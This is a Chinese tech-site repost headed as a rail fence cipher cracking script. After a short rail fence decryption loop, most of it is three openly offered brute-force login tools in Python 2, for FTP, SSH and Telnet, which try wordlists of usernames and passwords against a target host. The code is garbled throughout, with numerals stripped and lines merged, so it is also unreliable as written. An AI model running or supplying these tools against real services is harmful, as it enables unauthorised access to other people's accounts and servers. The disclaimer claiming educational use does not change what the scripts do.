iis服务器助手广告广告
返回顶部
首页 > 资讯 > 后端开发 > Python >Python脚本暴力破解栅栏密码
  • 183
分享到

Python脚本暴力破解栅栏密码

栅栏脚本暴力 2022-06-04 19:06:17 183人浏览 薄情痞子

Python 官方文档:入门教程 => 点击学习

摘要

今天遇到一个要破解的栅栏密码,先给大家介绍通用的脚本。 方法一(通用脚本): #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: ut

今天遇到一个要破解的栅栏密码,先给大家介绍通用的脚本。

方法一(通用脚本):


#!/usr/bin/env python
 # -*- coding: gbk -*-
 # -*- coding: utf_ -*-
 e = raw_input(‘请输入要解密的字符串n‘)
 elen = len(e)
 field=[]
 for i in range(,elen):
       if(elen%i==):
         field.append(i)
 for f in field:
   b = elen / f
   result = {x:‘‘ for x in range(b)}
   for i in range(elen):
     a = i % b;
     result.update({a:result[a] + e[i]})
   d = ‘‘
   for i in range(b):
     d = d + result[i]
   print ‘分为t‘+str(f)+‘t‘+‘栏时,解密结果为: ‘+d

方法二:

FTP暴力破解脚本


#!/usr/bin/env Python
#-*-coding = utf--*-
#author:@xfk
#blog:@blog.sina.com.cn/kaiyongdeng
#date:@--
import sys, os, time
from ftplib import FTP
docs = """
      [*] This was written for educational purpose and pentest only. Use it at your own risk. 
      [*] Author will be not responsible for any damage!
      [*] Toolname : ftp_bf.py
      [*] Coder :
      [*] Version : .
      [*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passWords.txt
    """
if sys.platfORM == 'linux' or sys.platform == 'linux':
  clearing = 'clear'
else:
  clearing = 'cls'
os.system(clearing)
R = "[m";
G = "[m";
Y = "[m"
END = "[m"
def loGo():
  print G+"n |---------------------------------------------------------------|"
  print " | |"
  print " | blog.sina.com.cn/kaiyongdeng |"
  print " | // ftp_bf.py v.. |"
  print " | FTP Brute Forcing Tool |"
  print " | |"
  print " |---------------------------------------------------------------|n"
  print " n [-] %sn" % time.strftime("%X")
  print docs+END
def help():
  print R+"[*]-t, --target ip/hostname <> Our target"
  print "[*]-u, --usernamelist usernamelist <> usernamelist path"
  print "[*]-p, --passwordlist passwordlist <> passwordlist path"
  print "[*]-h, --help help <> print this help"
  print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END sys.exit()
def bf_login(hostname,username,password):
  # sys.stdout.write("r[!]Checking : %s " % (p))
  # sys.stdout.flush()
  try:
    ftp = FTP(hostname)
    ftp.login(hostname,username, password)
    ftp.retrlines('list')
    ftp.quit()
    print Y+"n[!] wt,wt!!! We did it ! "
    print "[+] Target : ",hostname, ""
    print "[+] User : ",username, ""
    print "[+] Password : ",password, ""+END
    return 
  # sys.exit()
  except Exception, e:
    pass except KeyboardInterrupt: print R+"n[-] Exiting ...n"+END
  sys.exit()
def anon_login(hostname):
  try:
    print G+"n[!] Checking for anonymous login.n"+END
    ftp = FTP(hostname) ftp.login()
    ftp.retrlines('LIST')
    print Y+"n[!] wt,wt!!! Anonymous login successfuly !n"+END
    ftp.quit()
  except Exception, e:
    print R+"n[-] Anonymous login failed...n"+END
    pass
def main():
  logo()
  try:
    for arg in sys.argv:
      if arg.lower() == '-t' or arg.lower() == '--target':
        hostname = sys.argv[int(sys.argv[:].index(arg))+]
      elif arg.lower() == '-u' or arg.lower() == '--usernamelist':
        usernamelist = sys.argv[int(sys.argv[:].index(arg))+]
      elif arg.lower() == '-p' or arg.lower() == '--passwordlist':
        passwordlist = sys.argv[int(sys.argv[:].index(arg))+]
      elif arg.lower() == '-h' or arg.lower() == '--help':
        help()
      elif len(sys.argv) <= :
        help()
  except:
    print R+"[-]Cheak your parametars inputn"+END
    help()
  print G+"[!] BruteForcing target ..."+END
  anon_login(hostname)
  # print "here is ok"
  # print hostname
  try:
    usernames = open(usernamelist, "r")
    user = usernames.readlines()
    count = 
    while count < len(user):
      user[count] = user[count].strip()
      count +=
  except:
    print R+"n[-] Cheak your usernamelist pathn"+END
    sys.exit()
  # print "here is ok ",usernamelist,passwordlist
  try:
    passwords = open(passwordlist, "r")
    pwd = passwords.readlines()
    count = 
    while count < len(pwd):
      pwd[count] = pwd[count].strip()
      count +=
  except:
    print R+"n[-] Check your passwordlist pathn"+END
    sys.exit()
  print G+"n[+] Loaded:",len(user),"usernames"
  print "n[+] Loaded:",len(pwd),"passwords"
  print "[+] Target:",hostname
  print "[+] Guessing...n"+END
  for u in user: for p in pwd:
    result = bf_login(hostname,u.replace("n",""),p.replace("n",""))
    if result != :
      print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END
    else:
      print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END
    if not result :
      print R+"n[-]There is no username ans password enabled in the list."
      print "[-]Exiting...n"+END
if __name__ == "__main__":
  main()

SSH暴力破解


#!/usr/bin/env python
#-*-coding = UTF--*-
#author@:dengyongkai
#blog@:blog.sina.com.cn/kaiyongdeng
import sys
import os
import time
#from threading import Thread
try:
  from paramiko import sshClient
  from paramiko import AutoAddPolicy
except ImportError:
  print G+'''
  You need paramiko module.
Http://www.lag.net/paramiko/
  Debian/ubuntu: sudo apt-get install aptitude
     : sudo aptitude install python-paramikon'''+END
  sys.exit()
docs = """
      [*] This was written for educational purpose and pentest only. Use it at your own risk.
      [*] Author will be not responsible for any damage!                               
      [*] Toolname    : ssh_bf.py
      [*] Author     : xfk
      [*] Version     : v..
      [*] Example of use : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]
  """
if sys.platform == 'linux' or sys.platform == 'linux':
     clearing = 'clear'
else: 
     clearing = 'cls'
os.system(clearing)
R = "[m";
G = "[m";
Y = "[m"
END = "[m"
def logo():
     print G+"n        |---------------------------------------------------------------|"
     print "        |                                |"
     print "        |        blog.sina.com.cn/kaiyongdeng          |"
     print "        |        // ssh_bf.py v..           |"
     print "        |         SSH Brute Forcing Tool            |"
     print "        |                                |"
     print "        |---------------------------------------------------------------|n"
     print " n           [-] %sn" % time.ctime()
     print docs+END
def help():
  print Y+"    [*]-H    --hostname/ip    <>the target hostname or ip address"
  print "   [*]-P    --port     <>the ssh service port(default is )"
  print "   [*]-U    --usernamelist   <>usernames list file"
  print "   [*]-P    --passwordlist   <>passwords list file"
  print "   [*]-H    --help     <>show help information"
  print "   [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+END
  sys.exit()
def BruteForce(hostname,port,username,password):
    '''
    Create SSH connection to target
    '''
    ssh = SSHClient()
    ssh.set_missing_host_key_policy(AutoAddPolicy())
    try:
      ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False)
      status = 'ok'
      ssh.close()
    except Exception, e:
      status = 'error'
      pass
  return status
def makelist(file):
  '''
  Make usernames and passwords lists
  '''
  items = []
  try:
    fd = open(file, 'r')
  except IOError:
    print R+'unable to read file '%s'' % file+END
    pass
  except Exception, e:
    print R+'unknown error'+END
    pass
  for line in fd.readlines():
    item = line.replace('n', '').replace('r', '')
    items.append(item)
  fd.close() 
  return items
def main():
    logo() 
#  print "hello wold"
    try:  
        for arg in sys.argv:
            if arg.lower() == '-t' or arg.lower() == '--target':
                hostname = str(sys.argv[int(sys.argv[:].index(arg))+])
        if arg.lower() == '-p' or arg.lower() == '--port':
          port = sys.argv[int(sys.argv[:].index(arg))+]
            elif arg.lower() == '-u' or arg.lower() == '--userlist':
                userlist = sys.argv[int(sys.argv[:].index(arg))+]
            elif arg.lower() == '-w' or arg.lower() == '--wordlist':
                wordlist = sys.argv[int(sys.argv[:].index(arg))+]
            elif arg.lower() == '-h' or arg.lower() == '--help':
                help()
      elif len(sys.argv) <= :
                help()
    except:
        print R+"[-]Cheak your parametars inputn"+END
        help()
    print G+"n[!] BruteForcing target ...n"+END
#    print "here is ok"
#    print hostname,port,wordlist,userlist
    usernamelist = makelist(userlist)
    passwordlist = makelist(wordlist)
    print Y+"[*] SSH Brute Force Praparing."
    print "[*] %s user(s) loaded." % str(len(usernamelist))
    print "[*] %s password(s) loaded." % str(len(passwordlist))
    print "[*] Brute Force Is Starting......."+END
  try:
      for username in usernamelist:
        for password in passwordlist:
        print G+"n[+]Attempt uaername:%s password:%s..." % (username,password)+END
            current = BruteForce(hostname, port, username, password)
              if current == 'error':
          print R+"[-]O*O The username:%s and password:%s Is Disenbabled...n" % (username,password)+END
#                pass
              else:
                  print G+"n[+] ^-^ HaHa,We Got It!!!"
                  print "[+] username: %s" % username
                  print "[+] password: %sn" % password+END
#                  sys.exit()
  except:
    print R+"n[-] There Is Something Wrong,Pleace Cheak It."
    print "[-] Exitting.....n"+END
    raise
    print Y+"[+] Done.^-^n"+END
    sys.exit()
if __name__ == "__main__":
  main()

TELNET密码暴力破解


#!usr/bin/python
#Telnet Brute Forcer
#http://www.darkcde.com
#dhydr[at]gmail[dot]com
import threading, time, random, sys, telnetlib
from copy import copy
if len(sys.argv) !=:
  print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>"
  sys.exit()
try:
  users = open(sys.argv[], "r").readlines()
except(IOError):
  print "Error: Check your userlist pathn"
  sys.exit()
try:
  words = open(sys.argv[], "r").readlines()
except(IOError):
  print "Error: Check your wordlist pathn"
  sys.exit()
print "nt  dhydr[at]gmail[dot]com TelnetBruteForcer v."
print "t--------------------------------------------------n"
print "[+] Server:",sys.argv[]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"n"
wordlist = copy(words)
def reloader():
  for word in wordlist:
    words.append(word)
def getword():
  lock = threading.Lock()
  lock.acquire()
  if len(words) != :
    value = random.sample(words, )
    words.remove(value[])
  else:
    print "nReloading Wordlist - Changing Usern"
    reloader()
    value = random.sample(words, )
    users.remove(users[])
  lock.release()
  if len(users) ==:
    return value[][:-], users[]
  else:
    return value[][:-], users[][:-]
class Worker(threading.Thread):
  def run(self):
    value, user = getword()
    try:
      print "-"*
      print "User:",user,"Password:",value
      tn = telnetlib.Telnet(sys.argv[])
      tn.read_until("login: ")
      tn.write(user + "n")
      if password:
          tn.read_until("Password: ")
          tn.write(value + "n")
      tn.write("lsn")
      tn.write("exitn")
      print tn.read_all()
      print "tnLogin successful:",value, user
      tn.close()
      work.join()
      sys.exit()
    except:
      pass
for I in range(len(words)*len(users)):
  work = Worker()
  work.start()
  time.sleep()

--结束END--

本文标题: Python脚本暴力破解栅栏密码

本文链接: https://www.lsjlt.com/news/15746.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
猜你喜欢
  • 用 python 暴力破解同事密码(HT
     #-*- coding: utf-8 -*- import urllib,urllib2, cookielib cookie_support= urllib2.HTTPCookieProcessor(cookielib.Cookie...
    99+
    2023-01-31
    暴力 同事 密码
  • 利用Python暴力破解邻居家WiFi密码
    如觉得博主文章写的不错或对你有所帮助的话,还望大家多多支持呀!关注、点赞、收藏、评论。 文章目录 一、编写代码二、展示测试结果三、测试四、生成密码本(建议自己找一个密码本) ...
    99+
    2023-08-31
    python 开发语言
  • wifi 暴力破解 (python)
    python脚本 github:https://github.com/baihengaead/wifi-crack-tool python # -*- coding: utf-8 -*-from cg...
    99+
    2023-09-05
    python 开发语言
  • Python暴力破解附近局域网WiFi密码
    前言 本文将记录学习下如何通过 Python 脚本实现 WIFI 密码的暴力破解,从而实现免费蹭网。 无图形界面 先来看看没有图形界面版的爆破脚本。 WIFI爆破 import pywififrom pywifi import consti...
    99+
    2023-09-08
    安全 python 开发语言
  • python生成遍历暴力破解密码的方法
    python生成遍历暴力破解密码(这里已遍历暴力破解rar为例,只提供生成密码以及遍历密码) 这个也就是提供一个思路,需求是这样的,我XX的闺蜜有个rar的压缩包,不知道他是从哪里挣...
    99+
    2024-04-02
  • 如何用python暴力破解wifi密码EXE应用
    本篇内容介绍了“如何用python暴力破解wifi密码EXE应用”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成!前置准备-依赖库comtype...
    99+
    2023-07-04
  • Python实现暴力破解wifi密码并打包成exe
    目录前言功能点预览前置准备-依赖库Python tkinter编写GUI界面密码字典开撸打包成exe演示PS前言 python号称是编程界的万金油,那么是否可以做个读取电脑网卡wif...
    99+
    2024-04-02
  • 如何用shell脚本防ssh和vsftpd暴力破解
    本篇内容主要讲解“如何用shell脚本防ssh和vsftpd暴力破解”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“如何用shell脚本防ssh和vsftpd暴力破解”吧!脚本需求如下:此SHEL...
    99+
    2023-06-09
  • Python破解网站登录密码脚本
    目录关键代码解释完整代码方法一运行结果方法二运行结果测试靶机为DVWA,适合DVWA暴力破解模块的Low和Medium等级 关键代码解释 url指定url地址 url = "http...
    99+
    2024-04-02
  • Python实现暴力破解有密码的zip文件的方法
    背景 今天朋友给我发了一个某游戏的兑换码,压缩文件发过来的。结果被加密了。wc?还说叫爸爸就给我密码?男人是这么容易像恶势力低头的?直接给你爆了好吧,小兔崽子。 一、思路 爆密码的思...
    99+
    2024-04-02
  • Python实现栅栏密码的加密解密方法详解
    目录1.栅栏密码介绍2.栅栏密码加密3.栅栏密码解密(爆破)4.W型栅栏密码加密1.栅栏密码介绍 所谓栅栏密码,就是把要加密的明文分成N个一组,然后把每组的第1个字连起来,形成一段无...
    99+
    2023-01-16
    Python栅栏密码加密 Python栅栏密码解密
  • PHP代码审计入门-DVWA靶场暴力破解篇
    0x00  写在前面 从零学习php,最终目的实现代码审计入门,软件采用sublime text,环境使用phpstudy搭建,数据库是navicat,需要有基本的前端基础、简单的php+mysql后端基础、渗透知识和漏洞原理,文...
    99+
    2023-09-08
    php 开发语言 网络安全
  • Python+selenium破解拼图验证码的脚本
    目录实现思路核心代码实现思路 很多网站都有拼图验证码 1.首先要了解拼图验证码的生成原理 2.制定破解计划,考虑其可能性和成功率。 3.编写脚本 很多网站的拼图验证码都是直接借助第三...
    99+
    2024-04-02
  • python密码破解工具patator
    kali下默认安装patator,一款python的暴力破解工具,支持多种协议破解,速度快,使用方便。https://github.com/lanjelot/patator...
    99+
    2023-01-31
    密码破解 工具 python
  • dvwa靶场Brute Force(暴力破解)全难度教程(附代码分析)
    建议使用owaspbwa靶场可以不用搭建dvwa以及其他常用靶场,省去搭建靶场的困扰,但是此靶机靶场较老,并不建议使用 owaspbwa下载地址: OWASP Broken Web Applications Project downloa...
    99+
    2023-09-06
    安全 web安全 网络安全 php Powered by 金山文档
  • python 破解加密zip文件的密码
    目录今天的文章来自 盏茶作酒 同学。他在老电脑中发现了一个加密的 zip 文件,于是用 Python 破解了文件密码。在破解的过程中出现了内存爆炸的问题,通过阅读 Python 源代...
    99+
    2024-04-02
  • Python脚本加密,源码隐藏
    虽然资源共享,技术无边界,但是有些脚本源码还是不想让别人知道,所以通过编译加密就可以了。编译加密命令:python -m py_compile /root/666.py这样就把 .py 编译加密为 .pyc...
    99+
    2023-01-31
    脚本 源码 Python
  • 利用Python破解摩斯密码
    目录摩尔斯电码Python实现摩斯密码对照表加密解密测试完整代码总结在电影《无间道》中,刘建明(刘德华饰)作为黑帮的卧底在一次行动中发现了警察的卧底陈永仁(梁朝伟饰)与黄警督(黄秋生...
    99+
    2024-04-02
  • 如何用Python破解wifi密码
    如何用Python破解wifi密码,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。Python真的是无所不能,原因就是因为Python有数目庞大的库,无数的现成的轮子,让你做很多...
    99+
    2023-06-02
  • Python如何破解压缩包密码
    目录简介:1.步骤1.环境2.判断文件格式3.判断是否有密码4.密码字典 自己写或者下载相应的软件生成。5.解压文件2.代码1.在线调试2.脚本运行简介: 破解rar和zip压缩包。...
    99+
    2024-04-02
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作